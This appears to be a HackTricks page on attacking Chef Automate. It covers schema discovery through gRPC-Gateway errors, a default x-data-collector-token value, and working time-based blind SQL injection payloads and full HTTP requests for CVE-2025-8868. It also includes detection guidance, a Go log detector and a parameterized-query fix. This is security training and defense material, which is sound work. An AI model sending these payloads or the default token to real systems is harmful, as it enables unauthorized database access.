Chef Automate Enumeration & Attacks
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
This page collects practical techniques for enumerating and attacking Chef Automate instances, with emphasis on:
- Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
- Abusing the x-data-collector-token authentication header when defaults are present
- Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search
Note: backend responses that include the header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.
Recon: Architecture and Fingerprints
- Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
- API transport: REST to gRPC via gRPC-Gateway
- Responses may include grpc-metadata-content-type: application/grpc
- Database/driver fingerprints:
- Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
- Interesting Compliance endpoints (auth required):
- POST /api/v0/compliance/profiles/search
- POST /api/v0/compliance/scanner/jobs/search
Auth: Data Collector Token (x-data-collector-token)
Chef Automate exposes a data collector that authenticates requests via a dedicated header:
- Header: x-data-collector-token
- Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
If present, this token can be used to reach Compliance API endpoints that otherwise require auth. Always rotate/disable defaults during hardening.
API Schema Inference via Error-Driven Discovery
gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.
For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
- type: string (filter field identifier)
- values: array of strings
Example request shape:
{
"filters": [
{ "type": "name", "values": ["test"] }
]
}
Malformed JSON or wrong field types usually produce 4xx/5xx responses carrying hints, and the headers reveal gRPC-Gateway behaviour. Use these to map fields and identify injection surfaces.
Compliance API SQL Injection (CVE-2025-8868)
- Affected endpoint: POST /api/v0/compliance/profiles/search
- Injection point: filters[].type
- Vulnerability type: time-based blind SQL injection in PostgreSQL
- Root cause: missing parameterization/whitelisting when the type field is interpolated into a dynamic SQL fragment (likely used to build identifiers/WHERE clauses). Crafted values in type are executed by PostgreSQL.
Working time-based payload:
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
Technique notes:
- Close the original string with a single quote (')
- Concatenate a subquery that calls pg_sleep(N)
- Return to string context with || so the final SQL stays syntactically valid regardless of where type is placed
Confirmation via latency difference
Send paired requests and compare response times to confirm server-side execution:
- N = 1 second
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
- N = 5 seconds
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
Observed behavior:
- Response time grows by pg_sleep(N)
- HTTP 500 responses may include pq: details during testing, confirming the SQL execution path
Note: use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.
Impact
Authenticated users, or unauthenticated actors using the default x-data-collector-token, can execute arbitrary SQL within Chef Automate's PostgreSQL context, compromising the confidentiality and integrity of compliance profiles, configuration, and telemetry.
Affected versions / Fix
- CVE: CVE-2025-8868
- Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per the vendor advisory
Detection and Forensics
- API layer:
- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
- Database layer (PostgreSQL):
- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
- Authentication:
- Log and alert on use of x-data-collector-token, especially known default values, across API routes
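The API-layer and authentication checks above, as an added Go example that is not from the original page or from Chef Automate's own code: it parses constructed access records, flags filters[].type values carrying a quote, || or pg_sleep on the profiles search endpoint, and flags any request that presents the known default token. The log field names (path, status, token, body) are an assumption.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Default data-collector token quoted on this page; its use is itself alert-worthy.
const defaultCollectorToken = "93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506"
const complianceSearchPath = "/api/v0/compliance/profiles/search"
// accessRecord is an assumed, constructed log shape (one JSON object per request);
// a real gateway or proxy log needs its own field mapping.
type accessRecord struct {
	Path   string `json:"path"`
	Status int    `json:"status"`
	Token  string `json:"token"`
	Body   string `json:"body"`
}
// suspiciousType flags a filters[].type carrying a quote, SQL concatenation or pg_sleep.
func suspiciousType(t string) bool {
	return strings.Contains(t, "'") || strings.Contains(t, "||") ||
		strings.Contains(strings.ToLower(t), "pg_sleep")
}
// analyzeRecord returns findings for one log line; an empty slice means nothing stood out.
func analyzeRecord(line string) []string {
	var rec accessRecord
	if json.Unmarshal([]byte(line), &rec) != nil {
		return []string{"unparseable log line"}
	}
	var findings []string
	if rec.Token == defaultCollectorToken {
		findings = append(findings, "default x-data-collector-token used on "+rec.Path)
	}
	// Body shape follows the schema inferred above; only filters[].type is inspected.
	var body struct{ Filters []struct{ Type string `json:"type"` } `json:"filters"` }
	if rec.Path == complianceSearchPath && json.Unmarshal([]byte(rec.Body), &body) == nil {
		for i, f := range body.Filters {
			if suspiciousType(f.Type) {
				findings = append(findings, fmt.Sprintf("filters[%d].type looks like SQLi: %q (HTTP %d)", i, f.Type, rec.Status))
			}
		}
	}
	return findings
}

func main() { // constructed sample: the page's 5-second probe sent with the default token
	fmt.Println(analyzeRecord(`{"path":"/api/v0/compliance/profiles/search","status":500,"token":"` + defaultCollectorToken +
		`","body":"{\"filters\":[{\"type\":\"name'||(SELECT pg_sleep(5))||'\",\"values\":[\"test\"]}]}"}`))
}
```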
Mitigation and Hardening
- Immediate:
- Rotate/disable default data collector tokens
- Restrict ingress to data collector endpoints; enforce strong, unique tokens
- Code level:
- Parameterize queries; never assemble SQL fragments by string concatenation
- Enforce a strict server-side whitelist (enum) of allowed type values
- Avoid building SQL dynamically for identifiers/clauses; if dynamic behaviour is required, use safe identifier quoting and explicit whitelists
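The code-level fixes above, as an added illustration in Go (Chef Automate is a Go codebase, but this is not its code): filters[].type is resolved through a fixed allowlist of column identifiers and every value becomes a $n parameter, so the time-based payload shown earlier is rejected before any SQL exists. The table and column names are assumptions made for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// Filter mirrors one element of the filters array inferred on this page.
type Filter struct{ Type string; Values []string }
// allowedFilterColumns is the server-side allowlist: every accepted filters[].type maps to a
// fixed column identifier, so client input never becomes SQL text. Column names are assumed
// for illustration and are not taken from Chef Automate's real schema.
var allowedFilterColumns = map[string]string{
	"name":    "p.name",
	"version": "p.version",
	"owner":   "p.owner",
}
// buildProfileSearch returns a parameterized query and its arguments. An unknown type is
// rejected before any SQL is assembled (this lookup replaces the concatenated-identifier
// path behind CVE-2025-8868), and each value travels as a $n parameter, never as SQL text.
func buildProfileSearch(filters []Filter) (string, []interface{}, error) {
	var where []string
	var args []interface{}
	for _, f := range filters {
		col, ok := allowedFilterColumns[f.Type]
		if !ok {
			return "", nil, fmt.Errorf("unsupported filter type %q", f.Type)
		}
		if len(f.Values) == 0 { // IN () is invalid SQL, so refuse it explicitly
			return "", nil, fmt.Errorf("filter %q has no values", f.Type)
		}
		var placeholders []string
		for _, v := range f.Values {
			args = append(args, v)
			placeholders = append(placeholders, fmt.Sprintf("$%d", len(args)))
		}
		where = append(where, col+" IN ("+strings.Join(placeholders, ", ")+")")
	}
	query := "SELECT p.id, p.name, p.version FROM profiles p"
	if len(where) > 0 {
		query += " WHERE " + strings.Join(where, " AND ")
	}
	return query, args, nil
}

func main() { // the page's time-based payload is refused at the allowlist and never reaches PostgreSQL
	_, _, err := buildProfileSearch([]Filter{{Type: "name'||(SELECT pg_sleep(5))||'", Values: []string{"test"}}})
	fmt.Println(err)
}
```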
Practical Testing Checklist
- Check whether x-data-collector-token is accepted and whether the known default works
- Map the Compliance API schema by triggering validation errors and reading the error messages/headers
- Test for SQLi in non-obvious “identifier-like” fields (e.g., filters[].type), not only values arrays or top-level text fields
- Use time-based techniques with concatenation so the SQL stays syntactically valid in different contexts
References
- Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)
- Timing trace (XBOW)
- CVE-2025-8868
- gRPC-Gateway
- pq PostgreSQL driver for Go